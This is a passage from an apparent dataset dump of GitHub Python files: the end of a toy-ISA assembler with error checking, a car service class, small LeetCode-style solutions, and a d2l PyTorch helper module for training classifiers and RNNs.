-1,linelist[i]\n\n if ins_l[i] in l3:\n e3=reg_error_l3(ins_l[i])\n\n if (e3==-1):\n return -1,linelist[i]\n\n return 1,0\n # e1=reg_error_l1(l1)\n # e2=reg_error_l2(l2)\n # e3=reg_error_l3(l3)\n\n # if (e1 and e2 and e3):\n # return 1\n # else:\n # return -1\n \ndef ErrorCheck(lst,linelist): #ins_l\n varlist=[]\n labellist=[]\n z,y=is_valid_opcode(lst,linelist)\n if z==-1:\n return \"Line \"+y+\" Invalid instruction used\"\n z,y=error_len(lst,linelist)\n if z==-1:\n return \"Line \"+y+\" Invalid syntax\"\n z,y=syntax_error(lst,linelist)\n if z==-1:\n return \"Line \"+y+\" Invalid Syntax\"\n z,y=VarList(lst,varlist,linelist)\n if z==1:\n pass\n #print(varlist)\n else:\n return \"Line \"+y+\" Variables not defined at start\"\n z,y=Labellist(lst,labellist)\n if z==1:\n # print(labellist)\n pass\n else:\n return \"Line \"+y+\" Space between label and colon\"\n z,y=ImmediateError(lst,linelist)\n if z==0:\n return \"Line \"+y+\" $ does not preceed immediate value\"\n if z==-1:\n return \"Line \"+y+\" Immediate given out of range\"\n z,y=UndefinedVariables(lst,varlist,labellist,linelist)\n if z==-1:\n return \"Line \"+y+\" Undefined Variable\"\n if z==0:\n return \"Line \"+y+\" Misuse of label as variable\"\n z,y=UndefinedLabels(lst,varlist,labellist,linelist)\n if z==-1:\n return \"Line \"+y+\" Undefined Label\"\n if z==0:\n return \"Line \"+y+\" Misuse of variable as label\"\n z,y=haltError(lst,linelist)\n if z==-1:\n return \"Line \"+y+\" Halt used before last instruction\"\n if z==0:\n return \"Line \"+y+\" Halt not used to terminate program\"\n z,y=IllegalFlag(lst,linelist)\n if z==-1:\n return \"Line \"+y+\" Illegal usage of flag\"\n return \"No Errors\"\ndef input():\n with open(\"input.txt\",'r') as f:\n ins_l=[]\n linelist=[]\n ctr=1\n for i in f.readlines():\n split=i.split()\n if (split!=[]):\n if split[0][-1]==\":\":\n linelist.append(str(ctr))\n ins_l.append([split[0]])\n linelist.append(str(ctr))\n ins_l.append(split[1:])\n else:\n linelist.append(str(ctr))\n ins_l.append(split)\n ctr+=1\n \n #print(ins_l)\n #print(linelist)\n \n x = (ErrorCheck(ins_l,linelist))\n if x == \"No Errors\":\n return 1\n else:\n print (x)\n return 0\n\n\ndef add(e1,e2,e3):\n ans = \"\"\n ans += dic_isa[\"add\"][\"opcode\"]\n ans += \"00\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n ans += dic_r[e3]\n return ans\ndef sub(e1,e2,e3):\n ans = \"\"\n ans += dic_isa[\"sub\"][\"opcode\"]\n ans += \"00\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n ans += dic_r[e3]\n return ans\ndef mov(e1,e2,e3):\n ans = \"\"\n if e3:\n ans += dic_isa[\"mov1\"][\"opcode\"]\n ans += dic_r[e1]\n e2 = str(bin(int(e2[1:])))[2:]\n if (len(e2) != 8):\n for i in range (0,8-len(e2),1):\n ans += \"0\"\n ans += e2\n else:\n ans += dic_isa[\"mov2\"][\"opcode\"]\n ans += \"00000\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n return ans\ndef ld(e1,e2):\n ans = \"\"\n ans += dic_isa[\"ld\"][\"opcode\"]\n ans += dic_r[e1]\n r = variable[e2]\n if (len(r) != 8):\n for i in range (0,8-len(r),1):\n ans += \"0\"\n ans += r\n return ans\ndef st(e1,e2):\n ans = \"\"\n ans += dic_isa[\"st\"][\"opcode\"]\n ans += dic_r[e1]\n r = variable[e2]\n if (len(r) != 8):\n for i in range (0,8-len(r),1):\n ans += \"0\"\n ans += r\n return ans\ndef mul(e1,e2,e3):\n ans = \"\"\n ans += dic_isa[\"mul\"][\"opcode\"]\n ans += \"00\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n ans += dic_r[e3]\n return ans\ndef div(e1,e2):\n ans = \"\"\n ans += dic_isa[\"div\"][\"opcode\"]\n ans += \"00000\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n return ans\ndef rs(e1,e2):\n ans = \"\"\n ans += dic_isa[\"rs\"][\"opcode\"]\n ans += dic_r[e1]\n e2 = str(bin(int(e2[1:])))[2:]\n if (len(e2) != 8):\n for i in range (0,8-len(e2),1):\n ans += \"0\"\n ans += e2\n return ans\ndef ls(e1,e2):\n ans = \"\"\n ans += dic_isa[\"ls\"][\"opcode\"]\n ans += dic_r[e1]\n e2 = str(bin(int(e2[1:])))[2:]\n if (len(e2) != 8):\n for i in range (0,8-len(e2),1):\n ans += \"0\"\n ans += e2\n return ans\ndef xor(e1,e2,e3):\n ans = \"\"\n ans += dic_isa[\"xor\"][\"opcode\"]\n ans += \"00\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n ans += dic_r[e3]\n return ans\ndef or1(e1,e2,e3):\n ans = \"\"\n ans += dic_isa[\"or\"][\"opcode\"]\n ans += \"00\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n ans += dic_r[e3]\n return ans\ndef and1(e1,e2,e3):\n ans = \"\"\n ans += dic_isa[\"and\"][\"opcode\"]\n ans += \"00\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n ans += dic_r[e3]\n return ans\ndef not1(e1,e2):\n ans = \"\"\n ans += dic_isa[\"not\"][\"opcode\"]\n ans += \"00000\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n return ans\ndef cmp(e1,e2):\n ans = \"\"\n ans += dic_isa[\"cmp\"][\"opcode\"]\n ans += \"00000\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n return ans\ndef jmp(e1):\n ans = \"\"\n ans += dic_isa[\"jmp\"][\"opcode\"]\n ans += \"000\"\n r = labels[e1]\n if (len(r) != 8):\n for i in range (0,8-len(r),1):\n ans += \"0\"\n ans += r\n return ans\ndef jlt(e1):\n ans = \"\"\n ans += dic_isa[\"jlt\"][\"opcode\"]\n ans += \"000\"\n r = labels[e1]\n if (len(r) != 8):\n for i in range (0,8-len(r),1):\n ans += \"0\"\n ans += r\n return ans\ndef jgt(e1):\n ans = \"\"\n ans += dic_isa[\"jgt\"][\"opcode\"]\n ans += \"000\"\n r = labels[e1]\n if (len(r) != 8):\n for i in range (0,8-len(r),1):\n ans += \"0\"\n ans += r\n return ans\ndef je(e1):\n # print(e1)\n ans = \"\"\n ans += dic_isa[\"je\"][\"opcode\"]\n ans += \"000\"\n r = labels[e1]\n if (len(r) != 8):\n for i in range (0,8-len(r),1):\n ans += \"0\"\n ans += r\n return ans\ndef hlt():\n ans = \"\"\n ans += dic_isa[\"hlt\"][\"opcode\"]\n ans += \"00000000000\"\n return ans\n\ny = input()\nif y :\n dic_r = {\"R0\" : \"000\",\"R1\" : \"001\", \"R2\" : \"010\" , \"R3\" : \"011\" , \"R4\" : \"100\" , \"R5\" : \"101\" , \"R6\" :\"110\", \"FLAGS\" : \"111\"}\n dic_isa = {\n \"add\" : {\"opcode\" : \"10000\", \"type\" : \"a\"},\n \"sub\" : {\"opcode\" : \"10001\", \"type\" : \"a\"},\n \"mov1\" : {\"opcode\" : \"10010\", \"type\" : \"b\"},\n \"mov2\" : {\"opcode\" : \"10011\", \"type\" : \"c\"},\n \"ld\" : {\"opcode\" : \"10100\", \"type\" : \"d\"},\n \"st\" : {\"opcode\" : \"10101\", \"type\" : \"d\"},\n \"mul\" : {\"opcode\" : \"10110\", \"type\" : \"a\"},\n \"div\" : {\"opcode\" : \"10111\", \"type\" : \"c\"},\n \"rs\" : {\"opcode\" : \"11000\", \"type\" : \"b\"},\n \"ls\" : {\"opcode\" : \"11001\", \"type\" : \"b\"},\n \"xor\" : {\"opcode\" : \"11010\", \"type\" : \"a\"},\n \"or\" : {\"opcode\" : \"11011\", \"type\" : \"a\"},\n \"and\" : {\"opcode\" : \"11100\", \"type\" : \"a\"},\n \"not\" : {\"opcode\" : \"11101\", \"type\" : \"c\"},\n \"cmp\" : {\"opcode\" : \"11110\", \"type\" : \"c\"},\n \"jmp\" : {\"opcode\" : \"11111\", \"type\" : \"e\"},\n \"jlt\" : {\"opcode\" : \"01100\", \"type\" : \"e\"},\n \"jgt\" : {\"opcode\" : \"01101\", \"type\" : \"e\"},\n \"je\" : {\"opcode\" : \"01111\", \"type\" : \"e\"},\n \"hlt\" : {\"opcode\" : \"01010\", \"type\" : \"f\"},\n }\n memory= []\n for i in range(0,256,1) :\n x = str(bin(i))[2:]\n memory.append(x)\n with open(\"input.txt\",\"r\") as f:\n l = [ x for x in f.read().split(\"\\n\")]\n #print(l)\n labels = {}\n variable = {}\n counter = -1\n f = open(\"Output.txt\",\"w\")\n for i in l:\n counter += 1\n if i == \"\":\n pass\n else:\n m = [x for x in i.split()]\n #print(m)\n if m[0] == \"var\" :\n variable[m[1]] = memory[counter] \n if m[0][-1] == \":\" :\n # print(m)\n labels[m[0][0:-1]] = memory[counter]\n # print(m[0][0:-1])\n for i in l:\n if i == \"\":\n pass\n else:\n m = [x for x in i.split()]\n if m[0] == \"var\":\n pass\n if m[0][-1] == \":\" :\n m = m[1:]\n if m[0] == \"add\":\n ans = add(m[1],m[2],m[3])\n f.write(ans + \"\\n\")\n elif m[0] == \"sub\":\n ans = sub(m[1],m[2],m[3])\n f.write(ans + \"\\n\")\n elif m[0] == \"mov\":\n t = False\n if m[2][0] == \"$\":\n t = True\n ans = mov(m[1],m[2],t)\n f.write(ans + \"\\n\")\n elif m[0] == \"ld\":\n ans = ld(m[1],m[2])\n f.write(ans + \"\\n\")\n elif m[0] == \"st\":\n ans = st(m[1],m[2])\n #f.write(\"f\")\n f.write(ans + \"\\n\")\n elif m[0] == \"mul\":\n ans = mul(m[1],m[2],m[3])\n f.write(ans + \"\\n\")\n elif m[0] == \"div\":\n ans = div(m[1],m[2])\n f.write(ans + \"\\n\")\n elif m[0] == \"rs\":\n ans = rs(m[1],m[2])\n f.write(ans + \"\\n\")\n elif m[0] == \"ls\":\n ans = ls(m[1],m[2])\n f.write(ans + \"\\n\")\n elif m[0] == \"xor\":\n ans = xor(m[1],m[2],m[3])\n f.write(ans + \"\\n\")\n elif m[0] == \"or\":\n ans = or1(m[1],m[2],m[3])\n f.write(ans + \"\\n\")\n elif m[0] == \"and\":\n ans = and1(m[1],m[2],m[3])\n f.write(ans + \"\\n\")\n elif m[0] == \"not\":\n ans = not1(m[1],m[2])\n f.write(ans + \"\\n\")\n elif m[0] == \"cmp\":\n ans = cmp(m[1],m[2])\n f.write(ans + \"\\n\")\n elif m[0] == \"jmp\":\n ans = jmp(m[1])\n f.write(ans + \"\\n\")\n elif m[0] == \"jlt\":\n ans = jlt(m[1])\n f.write(ans + \"\\n\")\n elif m[0] == \"jgt\":\n ans = jgt(m[1])\n f.write(ans + \"\\n\")\n elif m[0] == \"je\":\n # print (labels.keys())\n ans = je(m[1])\n f.write(ans + \"\\n\")\n elif m[0] == \"hlt\":\n ans = hlt()\n f.write(ans + \"\\n\")\n f.close() #hello\n","repo_name":"ArnAg26/CO-Project","sub_path":"xtra/qs1.py","file_name":"qs1.py","file_ext":"py","file_size_in_byte":16078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26805734914","text":"from domain.car import Car\nfrom repository.car_repository import CarInMemoryRepository\n\n\nclass CarService:\n \"\"\"\n Manages car logic.\n \"\"\"\n\n def __init__(self, car_repository , repository, validator):\n \"\"\"\n Creates a car service.\n \"\"\"\n self.__validator = validator\n self.__repository = repository\n self.__car_repository = car_repository\n\n\n def add_car(self, id_car,model,an_cumparare , nr_km, garantie,an_fabricatie ):\n \"\"\"\n Creates a car\n :param id_car: int, the card id.\n :param indicator: int, the indicator.\n :param comfort_level: str, one of 'standard', 'high', 'premium'\n :param card_payment: bool\n :param model: str, the model\n \"\"\"\n if garantie =='da':\n garantie = True\n else:\n garantie = False\n car = Car(id_car, model, an_cumparare, nr_km, garantie, an_fabricatie)\n self.__car_repository.create(car)\n\n\n\n def remove_car(self, id_car):\n car_to_delete = self.__car_repository.read(id_car)\n if car_to_delete is not None:\n self.__car_repository.delete(id_car)\n\n\n def update_car(self, id_car,model, an_cumparare, nr_km, garantie, an_fabricatie):\n car_to_update=self.__repository.read(id_car)\n if car_to_update is not None:\n car = Car(id_car, model, an_cumparare, nr_km, garantie,an_fabricatie)\n self.__car_repository.update(car)\n\n def get_all(self):\n \"\"\"\n :return: a list of all the cars.\n \"\"\"\n return self.__car_repository.read()\n\n\n\n def garantie(self ):\n import datetime\n for car in self.__car_repository.read():\n car=self.__car_repository.read(car.id_entity)\n nr_km=car.nr_km\n an_cumparare=car.an_cumparare\n id_car=car.id_entity\n model=car.model\n an_fabricatie=car.an_fabricatie\n garantie=car.garantie\n x = datetime.datetime(2016, 12, 12)\n if nr_km<60000 and an_cumparare> x :\n garantie= 'da'\n else:\n garantie= 'nu'\n car = Car(id_car, model, an_cumparare, nr_km, garantie, an_fabricatie)\n self.__car_repository.update(car)\n\n def cautare(self, x, y, z):\n for car in self.__car_repository.read():\n car=self.__car_repository.read(car.id_entity)\n model=car.model\n an_cumparare=car.an_cumparare\n nr_km=car.nr_km\n an_fabricatie=car.an_fabricatie\n if x==model:\n print(model)\n if y==nr_km:\n print(nr_km)\n if z==an_fabricatie:\n print(an_fabricatie)\n","repo_name":"rollstar615/service_AUTO","sub_path":"service/car_service.py","file_name":"car_service.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27415235291","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\nimport queue\n\n\nclass Solution(object):\n def levelOrder(self, root):\n \"\"\"\n :type root: Node\n :rtype: List[List[int]]\n \"\"\"\n if root is None:\n return []\n\n res = []\n stack = queue.Queue()\n stack.put(root)\n\n while stack.empty() is not True:\n cur_nums = stack.qsize()\n temp = []\n for i in range(cur_nums):\n cur_node = stack.get()\n temp.append(cur_node.val)\n for node in cur_node.children:\n stack.put(node)\n res.append(temp)\n\n return res\n","repo_name":"Janeho454199/my_leetcode","sub_path":"tree/429-N叉树的层序遍历.py","file_name":"429-N叉树的层序遍历.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27329389145","text":"class Solution(object):\n def romanToInt(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n map = {\"M\":1000,\"D\": 500, \"C\": 100, \"L\": 50, \"X\": 10, \"V\": 5, \"I\": 1}\n res = 0\n for i in range(len(s)):\n if map[s[i]]>map[s[i-1]] and i>0:\n res -= map[s[i-1]]*2\n res += map[s[i]]\n return res\n","repo_name":"PrinceNathaniel/leetcode","sub_path":"013Roman2integer.py","file_name":"013Roman2integer.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26060118028","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\nfor tc in range(1, T+1):\n bracket = input()\n # print(bracket)\n\n stack = []\n result = 1\n for i in bracket:\n if i == '(':\n stack.append(i)\n else:\n if stack:\n stack.pop()\n else:\n result = -1\n break\n else:\n if stack:\n result = -1\n print(result)\n","repo_name":"SWan9710/algorithm","sub_path":"algorithm/06_Stack_I/bracket/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70971444249","text":"from matplotlib import pyplot as plt\nimport torch\nimport torch.utils.data as tdata\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchtext.vocab as Vocab\nimport random\nimport time\nimport zipfile\nimport math\nimport os\nimport collections\n\nimport d2lzh_pytorch as d2l\n\ndef show_scatter(x, y, timeParsed=5):\n plt.scatter(x, y, 1)\n plt.show(block=False)\n plt.pause(timeParsed)\n plt.close()\n\n## Return several (batch_size) features and labels every time.\ndef data_iter(batch_size, features, labels):\n num_examples = len(features)\n indices = list(range(num_examples))\n random.shuffle(indices) ## Randomly read data.\n for i in range(0, num_examples, batch_size):\n j = torch.LongTensor(indices[i: min(i + batch_size, num_examples)])\n yield features.index_select(0, j), labels.index_select(0, j)\n\n## Linear regression expression.\ndef linreg(X, w, b):\n return torch.mm(X, w) + b\n\n## Loss function of linear regression. (a - b) ^ 2 / 2\ndef squared_loss(y_hat, y):\n return (y_hat - y.view(y_hat.size()) ) ** 2 / 2\n\n## Stochastic Gradient Descent in small batches.\ndef sgd(params, lr, batch_size):\n for param in params:\n ## Use [param.data] to change param\n if param.grad is not None:\n param.data -= lr * param.grad / batch_size \n\ndef get_fashion_mnist_labels(labels):\n text_labels = ['t-shirt', 'trouser', 'pullover', 'dress', 'coat',\n 'sandal', 'shirt', 'sneaker', 'bag', 'ankle boot']\n return [text_labels[int(i)] for i in labels]\n\ndef show_fashion_mnist(images, labels, timeParsed=5):\n # 这里的_表示我们忽略(不使用)的变量\n _, figs = plt.subplots(1, len(images), figsize=(12, 12))\n for f, img, lbl in zip(figs, images, labels):\n f.imshow(img.view((28, 28)).numpy())\n f.set_title(lbl)\n f.axes.get_xaxis().set_visible(False)\n f.axes.get_yaxis().set_visible(False)\n plt.show(block=False)\n plt.pause(timeParsed)\n plt.close()\n\n## return: train_iter, test_iter\n## Use: for feature, label in train_iter..\ndef load_data_fashion_mnist(batch_size=256, num_workers=4):\n mnist_train = torchvision.datasets.FashionMNIST(\n root='~/StudyNote/PyTorch/Datasets/FashionMNIST', train=True, \n download=True, transform=transforms.ToTensor())\n mnist_test = torchvision.datasets.FashionMNIST(\n root='~/StudyNote/PyTorch/Datasets/FashionMNIST', train=False, \n download=True, transform=transforms.ToTensor())\n train_iter = tdata.DataLoader(mnist_train, batch_size=batch_size, \n shuffle=True, num_workers=num_workers)\n test_iter = tdata.DataLoader(mnist_test, batch_size=batch_size, \n shuffle=False, num_workers=num_workers)\n return train_iter, test_iter\n\n# device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\ndevice = torch.device(torch.device('cpu'))\n\n# def evaluate_accuracy(data_iter, net):\n# acc_sum, n = 0.0, 0\n# for X, y in data_iter:\n# X = X.to(device=device)\n# y = y.to(device=device)\n# acc_sum += (net(X).argmax(dim=1) == y).float().sum().item()\n# n += y.shape[0]\n# return acc_sum / n\n\ndef evaluate_accuracy(data_iter, net, device=None):\n if device is None and isinstance(net, torch.nn.Module):\n # 如果没指定device就使用net的device\n device = list(net.parameters())[0].device \n acc_sum, n = 0.0, 0\n with torch.no_grad():\n for X, y in data_iter:\n net.eval() # 评估模式, 这会关闭dropout\n acc_sum += (net(X.to(device)).argmax(dim=1) == y.to(device)).float().sum().cpu().item()\n net.train() # 改回训练模式\n n += y.shape[0]\n return acc_sum / n\n\ndef train_ch3(net, train_iter, test_iter, loss, num_epochs, batch_size,\n params=None, lr=None, optimizer=None):\n for epoch in range(num_epochs):\n startTime = time.time() \n train_l_sum, train_acc_sum, n = 0.0, 0.0, 0\n for X, y in train_iter:\n X = X.to(device=device)\n y = y.to(device=device)\n y_hat = net(X)\n l = loss(y_hat, y).sum()\n\n # 梯度清零\n if optimizer is not None:\n optimizer.zero_grad()\n elif params is not None and params[0].grad is not None:\n for param in params:\n if param.grad is not None:\n param.grad.data.zero_()\n\n l.backward()\n if optimizer is None:\n d2l.sgd(params, lr, batch_size)\n else:\n optimizer.step() # “softmax回归的简洁实现”一节将用到\n\n\n train_l_sum += l.item()\n train_acc_sum += (y_hat.argmax(dim=1) == y).sum().item()\n n += y.shape[0]\n test_acc = evaluate_accuracy(test_iter, net)\n duration = time.time() - startTime\n print('epoch %d, loss %.4f, train acc %.3f, test acc %.3f, time %.3f sec'\n % (epoch + 1, train_l_sum / n, train_acc_sum / n, test_acc, duration))\n\nclass FlattenLayer(torch.nn.Module):\n def __init__(self):\n super(FlattenLayer, self).__init__()\n def forward(self, x): # x shape: (batch, *, *, ...)\n return x.view(x.shape[0], -1)\n\ndef semilogy(x_vals, y_vals, x_label, y_label, x2_vals=None, y2_vals=None,\n legend=None, figsize=(3.5, 2.5), timeParsed=10):\n # d2l.set_figsize(figsize)\n d2l.plt.xlabel(x_label)\n d2l.plt.ylabel(y_label)\n d2l.plt.semilogy(x_vals, y_vals)\n if x2_vals and y2_vals:\n d2l.plt.semilogy(x2_vals, y2_vals, linestyle=':')\n d2l.plt.legend(legend)\n plt.show(block=False)\n plt.pause(timeParsed)\n plt.close()\n\n## Get 2 small batches from data set randomly.\ndef data_iter_random(corpus_indices, batch_size, num_steps, device=None):\n # 减1是因为输出的索引x是相应输入的索引y加1\n num_examples = (len(corpus_indices) - 1) // num_steps\n epoch_size = num_examples // batch_size\n example_indices = list(range(num_examples))\n random.shuffle(example_indices)\n\n # 返回从pos开始的长为num_steps的序列\n def _data(pos):\n return corpus_indices[pos: pos + num_steps]\n if device is None:\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n for i in range(epoch_size):\n # 每次读取batch_size个随机样本\n i = i * batch_size\n batch_indices = example_indices[i: i + batch_size]\n X = [_data(j * num_steps) for j in batch_indices]\n Y = [_data(j * num_steps + 1) for j in batch_indices]\n yield torch.tensor(X, dtype=torch.float32, device=device), torch.tensor(Y, dtype=torch.float32, device=device)\n\n## Get 2 small batches from data set consequently.\ndef data_iter_consecutive(corpus_indices, batch_size, num_steps, device=None):\n if device is None:\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n corpus_indices = torch.tensor(corpus_indices, dtype=torch.float32, device=device)\n data_len = len(corpus_indices)\n batch_len = data_len // batch_size\n indices = corpus_indices[0: batch_size*batch_len].view(batch_size, batch_len)\n epoch_size = (batch_len - 1) // num_steps\n for i in range(epoch_size):\n i = i * num_steps\n X = indices[:, i: i + num_steps]\n Y = indices[:, i + 1: i + num_steps + 1]\n yield X, Y\n\ndef load_data_jay_lyrics():\n ## Read chars.\n with zipfile.ZipFile('Datasets/jaychou_lyrics.txt.zip') as zin:\n with zin.open('jaychou_lyrics.txt') as f:\n corpus_chars = f.read().decode('utf-8')\n corpus_chars = corpus_chars.replace('\\n', ' ').replace('\\r', ' ')\n corpus_chars = corpus_chars[0:10000] # Use only 10k chars to train.\n\n ## Such as ['A', 'B', 'C' ..]\n idx_to_char = list(set(corpus_chars)) \n ## Such as {'A': 1, 'B': 2, 'C': 3 ..}\n char_to_idx = dict([(char, i) for i, char in enumerate(idx_to_char)])\n vocab_size = len(char_to_idx)\n corpus_indices = [char_to_idx[char] for char in corpus_chars] \n return corpus_indices, char_to_idx, idx_to_char, vocab_size\n\ndef one_hot(x, n_class, dtype=torch.float32): \n # X shape: (batch), output shape: (batch, n_class)\n x = x.long()\n res = torch.zeros(x.shape[0], n_class, dtype=dtype, device=x.device)\n res.scatter_(1, x.view(-1, 1), 1)\n return res\n\ndef to_onehot(X, n_class): \n # X shape: (batch, seq_len), output: seq_len elements of (batch, n_class)\n return [one_hot(X[:, i], n_class) for i in range(X.shape[1])]\n\n## Get predict string by prefix string\ndef predict_rnn(prefix, num_chars, rnn, params, init_rnn_state,\n num_hiddens, vocab_size, device, idx_to_char, char_to_idx):\n state = init_rnn_state(1, num_hiddens, device)\n output = [char_to_idx[prefix[0]]]\n for t in range(num_chars + len(prefix) - 1):\n # 将上一时间步的输出作为当前时间步的输入\n # X = F.one_hot(torch.tensor([[output[-1]]], device=device), vocab_size).float()\n X = to_onehot(torch.tensor([[output[-1]]], device=device), vocab_size)\n # 计算输出和更新隐藏状态\n (Y, state) = rnn(X, state, params)\n # 下一个时间步的输入是prefix里的字符或者当前的最佳预测字符\n if t < len(prefix) - 1:\n output.append(char_to_idx[prefix[t + 1]])\n else:\n output.append(int(Y[0].argmax(dim=1).item()))\n return ''.join([idx_to_char[i] for i in output])\n\ndef train_and_predict_rnn(rnn, get_params, init_rnn_state, num_hiddens,\n vocab_size, device, corpus_indices, idx_to_char,\n char_to_idx, is_random_iter, num_epochs, num_steps,\n lr, clipping_theta, batch_size, pred_period,\n pred_len, prefixes):\n if is_random_iter:\n data_iter_fn = d2l.data_iter_random\n else:\n data_iter_fn = d2l.data_iter_consecutive\n params = get_params()\n loss = nn.CrossEntropyLoss()\n\n for epoch in range(num_epochs):\n if not is_random_iter: # 如使用相邻采样,在epoch开始时初始化隐藏状态\n state = init_rnn_state(batch_size, num_hiddens, device)\n l_sum, n, start = 0.0, 0, time.time()\n data_iter = data_iter_fn(corpus_indices, batch_size, num_steps, device)\n for X, Y in data_iter:\n if is_random_iter: # 如使用随机采样,在每个小批量更新前初始化隐藏状态\n state = init_rnn_state(batch_size, num_hiddens, device)\n else: \n # 否则需要使用detach函数从计算图分离隐藏状态, 这是为了\n # 使模型参数的梯度计算只依赖一次迭代读取的小批量序列(防止梯度计算开销太大)\n for s in state:\n s.detach_()\n\n # inputs = F.one_hot(X, num_classes=vocab_size)\n inputs = to_onehot(X, vocab_size)\n # outputs有num_steps个形状为(batch_size, vocab_size)的矩阵\n (outputs, state) = rnn(inputs, state, params)\n # 拼接之后形状为(num_steps * batch_size, vocab_size)\n outputs = torch.cat(outputs, dim=0)\n # Y的形状是(batch_size, num_steps),转置后再变成长度为\n # batch * num_steps 的向量,这样跟输出的行一一对应\n y = torch.transpose(Y, 0, 1).contiguous().view(-1)\n # 使用交叉熵损失计算平均分类误差\n l = loss(outputs, y.long())\n\n # 梯度清0\n if params[0].grad is not None:\n for param in params:\n param.grad.data.zero_()\n l.backward()\n grad_clipping(params, clipping_theta, device) # 裁剪梯度\n d2l.sgd(params, lr, 1) # 因为误差已经取过均值,梯度不用再做平均\n l_sum += l.item() * y.shape[0]\n n += y.shape[0]\n\n if (epoch + 1) % pred_period == 0:\n print('epoch %d, perplexity %f, time %.2f sec' % (\n epoch + 1, math.exp(l_sum / n), time.time() - start))\n for prefix in prefixes:\n print(' -', predict_rnn(prefix, pred_len, rnn, params, init_rnn_state,\n num_hiddens, vocab_size, device, idx_to_char, char_to_idx))\n\n## Make ||g|| < theta.\ndef grad_clipping(params, theta, device):\n norm = torch.tensor([0.0], device=device)\n for param in params:\n norm += (param.grad.data ** 2).sum()\n norm = norm.sqrt().item()\n if norm > theta:\n for param in params:\n param.grad.data *= (theta / norm)\n\nclass RNNModel(nn.Module):\n def __init__(self, rnn_layer, vocab_size):\n super(RNNModel, self).__init__()\n self.rnn = rnn_layer\n self.hidden_size = rnn_layer.hidden_size * (\n 2 if rnn_layer.bidirectional else 1)\n self.vocab_size = vocab_size\n self.dense = nn.Linear(self.hidden_size, vocab_size)\n self.state = None\n \n def forward(self, inputs, state):\n X = to_onehot(inputs, self.vocab_size)\n ## Y.shape is (num_steps * batch_size, num_hiddens)\n Y, self.state = self.rnn(torch.stack(X), state)\n ## output.shape is (num_steps * batch_size, vocab_size)\n output = self.dense(Y.view(-1, Y.shape[-1]))\n return output, self.state\n\ndef predict_rnn_pytorch(prefix, num_chars, model, vocab_size, device, idx_to_char,\n char_to_idx):\n state = None\n output = [char_to_idx[prefix[0]]] # output会记录prefix加上输出\n for t in range(num_chars + len(prefix) - 1):\n X = torch.tensor([output[-1]], device=device).view(1, 1)\n if state is not None:\n if isinstance(state, tuple): # LSTM, state:(h, c) \n state = (state[0].to(device), state[1].to(device))\n else: \n state = state.to(device)\n\n (Y, state) = model(X, state)\n if t < len(prefix) - 1:\n output.append(char_to_idx[prefix[t + 1]])\n else:\n output.append(int(Y.argmax(dim=1).item()))\n return ''.join([idx_to_char[i] for i in output])\n\ndef train_and_predict_rnn_pytorch(model, num_hiddens, vocab_size, device,\n corpus_indices, idx_to_char, char_to_idx,\n num_epochs, num_steps, lr, clipping_theta,\n batch_size, pred_period, pred_len, prefixes):\n loss = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n model.to(device)\n state = None\n for epoch in range(num_epochs):\n l_sum, n, start = 0.0, 0, time.time()\n data_iter = d2l.data_iter_consecutive(corpus_indices, batch_size, num_steps, device) # 相邻采样\n for X, Y in data_iter:\n if state is not None:\n # 使用detach函数从计算图分离隐藏状态, 这是为了\n # 使模型参数的梯度计算只依赖一次迭代读取的小批量序列(防止梯度计算开销太大)\n if isinstance (state, tuple): # LSTM, state:(h, c) \n state = (state[0].detach(), state[1].detach())\n else: \n state = state.detach()\n\n (output, state) = model(X, state) # output: 形状为(num_steps * batch_size, vocab_size)\n\n # Y的形状是(batch_size, num_steps),转置后再变成长度为\n # batch * num_steps 的向量,这样跟输出的行一一对应\n y = torch.transpose(Y, 0, 1).contiguous().view(-1)\n l = loss(output, y.long())\n\n optimizer.zero_grad()\n l.backward()\n # 梯度裁剪\n d2l.grad_clipping(model.parameters(), clipping_theta, device)\n optimizer.step()\n l_sum += l.item() * y.shape[0]\n n += y.shape[0]\n\n try:\n perplexity = math.exp(l_sum / n)\n except OverflowError:\n perplexity = float('inf')\n if (epoch + 1) % pred_period == 0:\n print('epoch %d, perplexity %f, time %.2f sec' % (\n epoch + 1, perplexity, time.time() - start))\n for prefix in prefixes:\n print(' -', predict_rnn_pytorch(\n prefix, pred_len, model, vocab_size, device, idx_to_char,\n char_to_idx))\n\n# 本函数已保存在d2lzh_pytorch包中方便以后使用\ndef read_imdb(folder='train', data_root=\"Datasets/aclImdb\"): \n data = []\n for label in ['pos', 'neg']:\n folder_name = os.path.join(data_root, folder, label)\n for file in os.listdir(folder_name):\n with open(os.path.join(folder_name, file), 'rb') as f:\n review = f.read().decode('utf-8').replace('\\n', '').lower()\n data.append([review, 1 if label == 'pos' else 0])\n random.shuffle(data)\n return data\n\n## Split sentences to tokens.\n## data: 